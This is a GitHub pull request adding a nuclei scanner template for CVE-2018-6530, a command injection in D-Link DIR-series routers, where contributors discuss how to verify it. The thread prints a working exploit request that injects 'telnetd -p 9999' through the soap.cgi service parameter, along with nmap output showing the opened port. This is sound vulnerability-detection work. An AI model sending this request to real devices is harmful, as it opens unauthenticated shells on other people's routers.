Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Create CVE-2018-6530 #5545

Merged
merged 3 commits into from
Jul 4, 2023
Merged

Create CVE-2018-6530 #5545

merged 3 commits into from
Jul 4, 2023

Conversation

gy741
Copy link
Contributor

@gy741 gy741 commented Oct 2, 2022

Template / PR Information

Hello,

Added CVE-2018-6530

OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.

Template Validation

I've validated this template locally?

  • YES
  • NO

@gy741
Create CVE-2018-6530
26c8ac5 
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
@DhiyaneshGeek
Copy link
Member

@gy741 is it possible to share some set-up instructions to build a vulnerable environment ?

@gy741
Copy link
Contributor Author

gy741 commented Dec 16, 2022

Hello, @DhiyaneshGeek Because this vulnerability occurs in embedded systems, you must use an emulator such as the qemu emulator.

Ref: #5976

However, the setting method is different for each firmware.

I'll try the analysis.

@gy741
Copy link
Contributor Author

gy741 commented Dec 17, 2022

Hello, @DhiyaneshGeek @princechaddha

I succeeded in constructing the environment.

But there is one problem to detect the problem.

I ordered to run the telnetd and checked the connection through nmap and telnet connect.

Is there any idea to detect telnet?

NMAP command before template execution:

root@karas:~# nmap 192.168.0.1
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-17 00:09 EST
Nmap scan report for 192.168.0.1
Host is up (0.0021s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
80/tcp    open  http
443/tcp   open  https
8181/tcp  open  intermapper
49152/tcp open  unknown
MAC Address: 00:DE:FA:1A:01:00 (Unknown)

Template Execution Log:

root@karas:~# ./nuclei -t ~/test.yaml -u http://192.168.0.1:49152 --debug

POST /soap.cgi?service=whatever-control;telnetd -p 9999;whatever-invalid-shell HTTP/1.1
Host: 192.168.0.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml

test

NMAP command after template execution:

root@karas:~# nmap 192.168.0.1
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-17 00:09 EST
Nmap scan report for 192.168.0.1
Host is up (0.0041s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
80/tcp    open  http
443/tcp   open  https
8181/tcp  open  intermapper
9999/tcp  open  abyss    <------------------------ exploit
49152/tcp open  unknown
MAC Address: 00:DE:FA:1A:01:00 (Unknown)

I think, wget works, but I currently have no external internet connection available using the emulator environment. :)

@gy741
Copy link
Contributor Author

gy741 commented Dec 17, 2022

I tried to verify the PoC using file creation, but

The file is not moved to the web folder that is accessible to general users.

Not sure if it's an emulation issue.

image

@DhiyaneshGeek DhiyaneshGeek added Done Ready to merge and removed waiting for more info labels Jul 3, 2023
@princechaddha princechaddha merged commit 6848ab0 into projectdiscovery:main Jul 4, 2023
2 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@princechaddha princechaddha princechaddha approved these changes

@ritikchaddha ritikchaddha Awaiting requested review from ritikchaddha

Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels
Done Ready to merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@gy741 @DhiyaneshGeek @princechaddha